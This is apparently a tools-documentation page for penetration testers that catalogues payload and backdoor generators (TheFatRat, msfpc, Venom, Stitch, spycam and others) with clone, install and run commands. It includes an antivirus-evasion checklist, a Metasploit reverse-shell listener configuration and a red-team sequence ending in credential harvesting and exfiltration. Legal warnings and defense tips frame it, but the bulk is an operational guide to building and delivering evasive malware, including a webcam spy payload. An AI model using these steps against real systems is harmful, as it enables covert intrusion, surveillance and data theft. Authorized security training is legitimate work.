Skip to main content
Critical Security Warning: These tools create malicious payloads and should ONLY be used in authorized penetration testing environments. Creating or distributing malware without authorization is illegal. Always obtain explicit written permission before using these tools.

Overview

Payload creation tools help security professionals generate custom backdoors and payloads for authorized penetration testing. These tools:
  • Create payloads that bypass antivirus detection
  • Generate backdoors for various platforms
  • Automate payload obfuscation and encoding
  • Provide reverse shell capabilities
  • Enable post-exploitation testing
  • Assess endpoint protection effectiveness
All payload creation should be performed in isolated lab environments with proper security controls.

TheFatRat

Easy-to-use tool for creating undetectable backdoors

MSFvenom

Metasploit’s powerful payload generator wrapper

Venom

Advanced shellcode generator with Apache integration

Stitch

Cross-platform Python Remote Administrator Tool

Available Payload Creation Tools

Multi-Platform Payload Generators

Description: TheFatRat provides an easy way to create backdoors and payloads which can bypass most anti-virus softwareInstallation:
git clone https://github.com/Screetsec/TheFatRat.git
cd TheFatRat
sudo chmod +x setup.sh
Usage:
cd TheFatRat
sudo bash setup.sh
Features:
  • Multiple Payload Types: Windows, Linux, macOS, Android
  • AV Evasion: Built-in obfuscation techniques
  • Easy Interface: User-friendly menu system
  • Metasploit Integration: Works with MSF framework
  • Custom Backdoors: Create tailored payloads
Payload Types:
  • Windows backdoors (exe, dll)
  • Android APK backdoors
  • Powershell payloads
  • Macro-based payloads
  • PDF/Office document payloads
Additional Commands:
# Update TheFatRat
cd TheFatRat
bash update
chmod +x setup.sh
bash setup.sh

# Troubleshoot installation
cd TheFatRat
sudo chmod +x chk_tools
./chk_tools
GitHub: Screetsec/TheFatRat
Description: MSFvenom Payload Creator is a wrapper to generate multiple types of payloads based on user choice, simplifying the payload creation processInstallation:
git clone https://github.com/g0tmi1k/msfpc.git
cd msfpc
sudo chmod +x msfpc.sh
Usage:
cd msfpc

# Show help and version
sudo bash msfpc.sh -h -v

# Generate Windows payload
./msfpc.sh windows

# Generate Linux payload
./msfpc.sh linux

# Generate Android payload
./msfpc.sh apk
Features:
  • Simplified MSFvenom interface
  • Multiple payload formats
  • Automatic listener setup
  • Batch payload generation
  • Template-based creation
Supported Platforms:
  • Windows (exe, dll, msi)
  • Linux (elf)
  • macOS (macho)
  • Android (apk)
  • Python, PHP, ASP
  • Java (jar, war)
GitHub: g0tmi1k/msfpc
Description: Venom 1.0.11 exploits Apache2 webserver to deliver payloads via fake webpages, providing advanced malicious server capabilitiesInstallation:
git clone https://github.com/r00t-3xp10it/venom.git
sudo chmod -R 775 venom*/
cd venom*/
cd aux
sudo bash setup.sh

# Update Venom
sudo ./venom.sh -u
Usage:
cd venom
sudo ./venom.sh
Features:
  • Apache2 Integration: Deploy payloads via web server
  • Fake Webpages: Deliver payloads through legitimate-looking pages
  • LAN Delivery: Target local network systems
  • Multiple Encoders: Bypass AV detection
  • Automation: Automated payload delivery
Use Cases:
  • LAN-based payload delivery
  • Web-based exploitation
  • Social engineering attacks
  • Internal penetration testing
GitHub: r00t-3xp10it/venom

Remote Administration Tools

Description: Stitch is a Cross-Platform Python Remote Administrator Tool with support for Windows, macOS, and LinuxInstallation:
git clone https://github.com/nathanlopez/Stitch.git
cd Stitch

# Linux installation
sudo pip install -r lnx_requirements.txt
Usage:
cd Stitch
sudo python main.py
Features:
  • Cross-Platform: Windows, macOS, Linux support
  • Remote Control: Full system access
  • File Operations: Upload/download files
  • Command Execution: Run arbitrary commands
  • Persistence: Maintain access across reboots
Platform-Specific Requirements:
  • Linux: lnx_requirements.txt
  • Windows: Refer to documentation
  • macOS: Refer to documentation
For Windows and macOS installation instructions, refer to the project documentation.
Website: nathanlopez.github.io/Stitch

Specialized Payload Tools

Description: Brutal is a toolkit to quickly create various payloads, powershell attacks, virus attacks and launch listeners for Human Interface DevicesInstallation:
git clone https://github.com/Screetsec/Brutal.git
cd Brutal
sudo chmod +x Brutal.sh
Usage:
cd Brutal
sudo bash Brutal.sh
Requirements:
  • Arduino Software (v1.6.7 or higher)
  • TeensyDuino
  • Linux udev rules
  • PaensyLib folder in Arduino libraries
Installation Guide: Visit: Brutal Wiki - Install RequirementsFeatures:
  • HID attack payloads
  • PowerShell attack scripts
  • Teensy/Arduino support
  • Rubber Ducky payloads
  • Automated attack sequences
Attack Types:
  • USB Rubber Ducky attacks
  • Teensy-based attacks
  • PowerShell execution
  • Payload injection
GitHub: Screetsec/Brutal
Description: Generates a Win32 payload that captures webcam images every 1 minute and sends them to the attackerInstallation:
git clone https://github.com/indexnotfound404/spycam.git
cd spycam
bash install.sh
chmod +x spycam
Usage:
cd spycam
./spycam
Features:
  • Automated webcam capture
  • Periodic image collection (1-minute intervals)
  • Remote image transmission
  • Windows target support
Use Cases:
  • Physical security testing
  • Social engineering assessment
  • Awareness training demonstrations
GitHub: indexnotfound404/spycam

Mobile & Android Payloads

Description: Mob-Droid generates Metasploit Android payloads easily without typing long commandsInstallation:
git clone https://github.com/kinghacker0/mob-droid.git
Usage:
cd mob-droid
sudo python mob-droid.py
Features:
  • Simplified Android payload generation
  • Metasploit integration
  • Multiple payload options
  • Easy-to-use interface
  • Automatic APK creation
Generated Payloads:
  • Android Meterpreter
  • Reverse TCP connections
  • Reverse HTTP/HTTPS
  • Custom LHOST/LPORT
GitHub: kinghacker0/Mob-Droid
Description: Enigma is a multiplatform payload dropper for various operating systemsInstallation:
git clone https://github.com/UndeadSec/Enigma.git
Usage:
cd Enigma
sudo python enigma.py
Features:
  • Multi-platform support
  • Payload dropping capabilities
  • Various payload formats
  • Easy deployment
Supported Platforms:
  • Windows
  • Linux
  • Android
  • macOS
GitHub: UndeadSec/Enigma

Payload Development Workflow

1

Requirements Analysis

Identify target platform, required capabilities, and evasion requirements
2

Payload Generation

Use appropriate tool to generate payload with desired functionality
3

Obfuscation

Apply encoding and obfuscation techniques to evade detection
4

Testing

Test payload in isolated environment against security controls
5

Delivery

Deploy payload through authorized delivery mechanism
6

Handler Setup

Configure listener to receive connections from payload

Evasion Techniques

Antivirus Bypass Methods

Encoding

Multiple encoding layers to obscure payload signature

Encryption

Encrypt payload with runtime decryption

Obfuscation

Modify code structure and variable names

Packing

Use custom packers to compress and hide payload

Best Practices for AV Evasion

Evasion Testing Tips:
  • Use multiple encoding iterations
  • Avoid known malicious signatures
  • Test against target AV before deployment
  • Use custom templates instead of defaults
  • Implement time-based or environment-based execution
  • Utilize living-off-the-land binaries (LOLBins)

Example Workflows

Generate Windows Backdoor

# Using TheFatRat
cd TheFatRat
sudo bash setup.sh
# Select option for Windows backdoor
# Configure LHOST and LPORT
# Generate payload

# Using MSFPC
cd msfpc
./msfpc.sh windows
# Follow prompts for configuration

Create Android Payload

# Using Mob-Droid
cd mob-droid
sudo python mob-droid.py
# Select payload type
# Set LHOST and LPORT
# Generate APK

# Using TheFatRat
cd TheFatRat
sudo bash setup.sh
# Select Android APK option
# Configure settings
# Build APK

Setup Listener

# Start Metasploit
msfconsole

# Configure handler
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <your_ip>
set LPORT <your_port>
exploit -j

Payload Types Comparison

Payload TypePlatformUse CaseStealth
EXEWindowsDesktop/ServerMedium
DLLWindowsInjection/PersistenceHigh
APKAndroidMobile devicesMedium
ELFLinuxServer/DesktopMedium
MacroOfficeDocument-basedHigh
PowerShellWindowsFileless attacksVery High
PythonCross-platformScriptingHigh

Security Testing Scenarios

Antivirus Testing

Objective: Assess endpoint protection effectivenessProcess:
  1. Generate baseline payload with default settings
  2. Test detection rate
  3. Apply obfuscation techniques
  4. Retest with modified payload
  5. Document detection results
  6. Recommend improvements
Metrics:
  • Detection rate before/after obfuscation
  • Time to detection
  • Response actions taken
  • False positive rate

Red Team Operations

Objective: Test organizational security posturePhases:
  1. Initial Access: Deliver payload via authorized method
  2. Execution: Achieve code execution on target
  3. Persistence: Maintain access across reboots
  4. Privilege Escalation: Gain higher-level access
  5. Defense Evasion: Avoid detection by security tools
  6. Credential Access: Harvest credentials
  7. Discovery: Enumerate environment
  8. Lateral Movement: Spread to other systems
  9. Collection: Gather sensitive data
  10. Exfiltration: Remove data from network
Critical Legal Requirements:
  1. Written Authorization: Obtain explicit written permission
  2. Scope Definition: Clearly define authorized systems and activities
  3. Legal Review: Have authorization reviewed by legal counsel
  4. Compliance: Follow all applicable laws and regulations
  5. Liability: Understand potential legal and liability issues
  6. Criminal Laws: Be aware of computer fraud and abuse laws

Responsible Use

Ethical Guidelines:
  • Only create payloads for authorized testing
  • Store payloads securely in isolated environments
  • Never distribute payloads publicly
  • Delete payloads after testing completion
  • Document all payload creation and usage
  • Follow responsible disclosure for vulnerabilities found
  • Maintain professional certifications and standards

Detection and Defense

How to Detect Malicious Payloads

Signature Detection

Traditional AV using known malware signatures

Behavioral Analysis

Monitor for suspicious behavior patterns

Sandboxing

Execute files in isolated environment

Heuristic Analysis

AI/ML-based detection of malicious code

Defense Recommendations

  • Implement application whitelisting
  • Use advanced EDR solutions
  • Enable PowerShell logging and constraints
  • Deploy network segmentation
  • Monitor for unusual outbound connections
  • Regular security awareness training
  • Patch management and vulnerability scanning

Training and Certifications

  • OSCP - Offensive Security Certified Professional
  • CRTO - Certified Red Team Operator
  • PNPT - Practical Network Penetration Tester
  • eCPPT - eLearnSecurity Certified Professional Penetration Tester

Practice Environments

  • HackTheBox
  • TryHackMe
  • PentesterLab
  • VulnHub
  • SANS NetWars

Build docs developers (and LLMs) love

Get started for freeTalk to us